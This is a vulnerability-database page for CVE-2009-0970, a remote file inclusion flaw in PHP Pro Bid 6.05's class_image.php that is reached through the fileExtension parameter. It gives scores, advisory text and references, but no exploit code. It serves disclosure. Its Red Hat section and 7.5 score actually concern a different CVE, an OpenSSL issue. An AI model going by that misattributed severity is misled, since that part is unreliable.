CVE-2009-0970
published 2009-03-19CVE-2009-0970: PHP remote file inclusion vulnerability in includes/class_image.php in PHP Pro Bid 6.05, when register_globals is enabled, allows remote attackers to execute…
PriorityP431medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EPSS
1.80%
75.7th percentile
PHP remote file inclusion vulnerability in includes/class_image.php in PHP Pro Bid 6.05, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the fileExtension parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpprobid | php_pro_bid | — | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wp22-wqwx-2pc9: PHP remote file inclusion vulnerability in includes/class_image
ghsa_unreviewed·2022-05-02
CVE-2009-0970 [MEDIUM] CWE-94 GHSA-wp22-wqwx-2pc9: PHP remote file inclusion vulnerability in includes/class_image
PHP remote file inclusion vulnerability in includes/class_image.php in PHP Pro Bid 6.05, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the fileExtension parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Red Hat
CVE-2009-0653: OpenSSL, probably 0
vendor_redhat·CVSS 7.5
CVE-2009-0653 [HIGH] CVE-2009-0653: OpenSSL, probably 0
OpenSSL, probably 0.9.6, does not verify the Basic Constraints for an intermediate CA-signed certificate, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack, a related issue to CVE-2002-0970.
Statement: Not vulnerable. This issue was addressed in upstream OpenSSL prior to 0.9.6 and therefore does not affect the versions of OpenSSL as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
http://secunia.com/advisories/34278http://www.osvdb.org/52750http://www.securityfocus.com/bid/34145https://exchange.xforce.ibmcloud.com/vulnerabilities/49290http://secunia.com/advisories/34278http://www.osvdb.org/52750http://www.securityfocus.com/bid/34145https://exchange.xforce.ibmcloud.com/vulnerabilities/49290
2009-03-19
Published